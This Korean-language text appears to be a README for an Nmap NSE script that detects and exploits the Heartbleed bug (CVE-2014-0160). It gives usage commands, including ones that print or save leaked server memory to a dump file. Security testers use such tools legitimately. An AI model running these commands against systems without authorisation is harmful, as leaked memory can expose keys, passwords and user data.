
Heartbleed/CVE-2014-0160을 발견/악용하는 Nmap NSE 스크립트
Heartbleed/CVE-2014-0160을 탐지/악용하는 Nmap NSE 스크립트입니다. 이 스크립트는 기본적으로 Patrik Karlsson이 작성한 스크립트에 제가 만든 스크립트의 일부 변경 사항을 이식한 것입니다.
이 스크립트는 모든 SSL, FTP, SMTP 및/또는 XMPP 포트에서 실행됩니다.
$ nmap --script ./openssl-heartbleed.nse host.tld
누출된 메모리 덤프는 -d 플래그를 통해 Nmap의 디버그 레벨을 높이면 활성화됩니다.
$ nmap -d --script=./openssl-heartbleed.nse host.tld
$ nmap --script ./ssl-heartbleed.nse --script-args 'ssl-heartbleed.dumpfile=/tmp/heartbleed.dump' host.tld
서비스가 감지되었는지 여부와 관계없이 스크립트가 모든 포트에서 실행되도록 강제합니다.
$ nmap --script +./ssl-heartbleed.nse host.tld